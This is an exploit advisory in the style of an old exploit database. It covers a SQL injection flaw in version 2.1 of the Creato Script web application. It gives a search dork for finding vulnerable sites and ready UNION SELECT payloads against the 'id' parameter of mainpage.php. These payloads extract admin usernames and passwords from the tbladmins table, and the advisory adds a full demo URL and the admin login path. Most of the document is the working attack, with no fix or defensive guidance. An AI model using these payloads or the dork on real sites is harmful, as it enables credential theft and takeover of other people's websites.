[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Creato Script SQL Injection Vulnerability
# Published : 2010-05-30
# Author : Mr.P3rfekT
# Previous Title : CMScout (XSS/HTML Injection) Multiple Vulnerabilities
# Next Title : Symphony CMS Local File Inclusion Vulnerability
# Title: Creato Script SQL Injection Vulnerability
# Version: 2.1
# Author: Mr.P3rfekT
# Software Site: http://www.creato.biz
# Tested on Lunix
# CVE : N/A
############### Founded By Mr.P3rfekT ###############
# Dork : " created by creato.biz "
# Helllo Allz.
# Exploit :
http://[site]/mainpage.php?id={SQLi}
# Poc Username:
union select 1,adminusername,3,4,5,6,7,8,9,10,11,12 from tbladmins--
# Poc Password:
# union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
# Demo:
http://[site]/mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
# Admin Login
# http://[site]/admun/login.php
# ./done.
####################################################################
MaiL :R4p@hotmail.com
Greeetz To : Sinaritx,HcJ,Mr.Black,D3ViL H4CK3R,Uzm4n,Nani17,Cyb3r-DeViL,www.v4-team.com,www.arab-exploit.com Cr3w,www.Barcelonasy.com & All Who Known Me
###############################################